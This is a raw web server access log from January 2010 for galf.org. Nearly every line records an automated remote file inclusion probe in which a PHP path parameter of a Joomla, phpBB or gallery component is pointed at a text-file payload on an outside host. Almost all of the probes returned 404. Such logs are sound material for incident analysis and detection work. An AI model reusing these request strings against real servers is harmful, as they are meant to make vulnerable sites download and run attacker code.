222.122.26.58 - - [11/Jan/2010:03:54:39 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:54:39 -0800] "GET /logs/access_090810.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:54:42 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:54:51 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:54:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:54:55 -0800] "GET /logs/access_090608.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:04 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:05 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:05 -0800] "GET /logs/access_090608.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:06 -0800] "GET /logs/access_090608.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:06 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:07 -0800] "GET /logs/access_090608.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:07 -0800] "GET /logs/access_090914.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:07 -0800] "GET /logs/access_090914.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:07 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:28 -0800] "GET /logs/access_091221.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:34 -0800] "GET /logs/access_091109.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:38 -0800] "GET /logs/access_090803.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:40 -0800] "GET /logs/access_090713.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:41 -0800] "GET /logs/access_091130.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:46 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:47 -0800] "GET /logs/access_091019.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:50 -0800] "GET /logs/access_090928.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:50 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:50 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:54 -0800] "GET /logs/access_091123.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:54 -0800] "GET /logs/access_090928.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:54 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:55:56 -0800] "GET /logs/access_090629.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:55:58 -0800] "GET /logs/access_090914.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:00 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:05 -0800] "GET /logs/access_091214.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:05 -0800] "GET /logs/access_090727.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:06 -0800] "GET /logs/access_090921.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:03:56:10 -0800] "GET /logs/access_090914.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:15 -0800] "GET /logs/access_091228.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:21 -0800] "GET /logs/access_090817.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:22 -0800] "GET /logs/access_091116.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:22 -0800] "GET /logs/access_100104.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:23 -0800] "GET /logs/access_091012.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:56:53 -0800] "GET /logs/access_090907.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:57:19 -0800] "GET /logs/access_090525.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:57:28 -0800] "GET /logs/access_090720.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:57:29 -0800] "GET /logs/access_090622.log%20%20//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:58:00 -0800] "GET /logs/access_090831.log//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.168.150.158 - - [11/Jan/2010:03:58:00 -0800] "GET /logs/access_091207.log//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:02:20 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:02:20 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:02:20 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:02:23 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:02:23 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:02:24 -0800] "GET /logs/access.log%20%20//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:03:28 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:03:32 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:04:04:01 -0800] "GET /logs/access_090907.log//components/com_performs/performs.php?mosConfig_admin_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:07:36 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.56.83 - - [11/Jan/2010:04:07:53 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:09:33 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:09:33 -0800] "GET /logs/access_090803.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:09:33 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:09:59 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:09:59 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:04:09:59 -0800] "GET /logs/access_090803.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.232.220 - - [11/Jan/2010:04:11:52 -0800] "GET /logs/access_100104.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.149.232.220 - - [11/Jan/2010:04:11:52 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.149.232.220 - - [11/Jan/2010:04:11:52 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:15:44 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:15:44 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:15:44 -0800] "GET /logs/access_090706.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:15:56 -0800] "GET /logs/access_090921.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:04:18:11 -0800] "GET /logs/access_091221.log//components/com_performs/performs.php?mosConfig_admin_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:19:07 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:19:07 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:19:07 -0800] "GET /logs/access_090706.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:19:08 -0800] "GET /logs/access_090921.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [11/Jan/2010:04:24:13 -0800] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:25:33 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:25:33 -0800] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:25:33 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:25:34 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:25:35 -0800] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:25:35 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:26:22 -0800] "GET /logs/access.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:26:26 -0800] "GET /logs/access.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:29:09 -0800] "GET /logs/access_091207.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:29:14 -0800] "GET /logs/access_091207.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:30:53 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:30:53 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:30:53 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:31:59 -0800] "GET /logs/access_100104.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:31:59 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:31:59 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:34:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:34:21 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:34:21 -0800] "GET /logs/access_090629.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:34:25 -0800] "GET /logs/access_090727.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:36:04 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "galf.org"
207.191.225.96 - - [11/Jan/2010:04:36:05 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "galf.org"
75.125.222.82 - - [11/Jan/2010:04:37:00 -0800] "GET /logs/access_091207.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.222.82 - - [11/Jan/2010:04:37:05 -0800] "GET /logs/access_090928.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [11/Jan/2010:04:37:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://antempresas.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.832" "galf.org"
61.47.7.71 - - [11/Jan/2010:04:37:35 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:37:35 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:37:35 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [11/Jan/2010:04:37:56 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:38:41 -0800] "GET /skin/zero_vote/error.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:38:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [11/Jan/2010:04:38:41 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [11/Jan/2010:04:39:24 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
